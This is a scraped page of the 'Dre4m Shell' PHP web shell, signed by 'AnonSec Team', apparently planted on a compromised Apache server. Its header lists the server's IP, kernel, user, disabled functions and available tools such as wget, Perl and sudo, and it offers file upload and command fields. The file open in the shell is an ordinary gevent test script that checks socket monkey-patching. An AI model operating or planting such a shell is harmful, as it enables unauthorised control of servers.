Dre4m Shell
Server IP : 85.214.239.14  /  Your IP : 3.141.3.175
Web Server : Apache/2.4.61 (Debian)
System : Linux h2886529.stratoserver.net 4.9.0 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : www-data ( 33)
PHP Version : 7.4.18
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /srv/modoboa/env/lib64/python3.5/site-packages/gevent/tests/monkey_package/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /srv/modoboa/env/lib64/python3.5/site-packages/gevent/tests/monkey_package//issue302monkey.py
from __future__ import print_function
import socket
import sys
if sys.argv[1] == 'patched':
    print('gevent' in repr(socket.socket))
else:
    assert sys.argv[1] == 'stdlib'
    print('gevent' not in repr(socket.socket))
print(__file__)

if sys.version_info[:2] == (2, 7):
    # Prior to gevent 1.3, 'python -m gevent.monkey' guaranteed this to be
    # None for all python versions.
    print(__package__ == None)
else:
    if sys.argv[1] == 'patched':
        # __package__ is handled differently, for some reason, and
        # runpy doesn't let us override it. When we call it, it
        # becomes ''. This appears to be against the documentation for
        # runpy, which says specifically "If the supplied path
        # directly references a script file (whether as source or as
        # precompiled byte code), then __file__ will be set to the
        # supplied path, and __spec__, __cached__, __loader__ and
        # __package__ will all be set to None."
        print(__package__ == '')
    else:
        # but the interpreter sets it to None
        print(__package__ == None)

Anon7 - 2022
AnonSec Team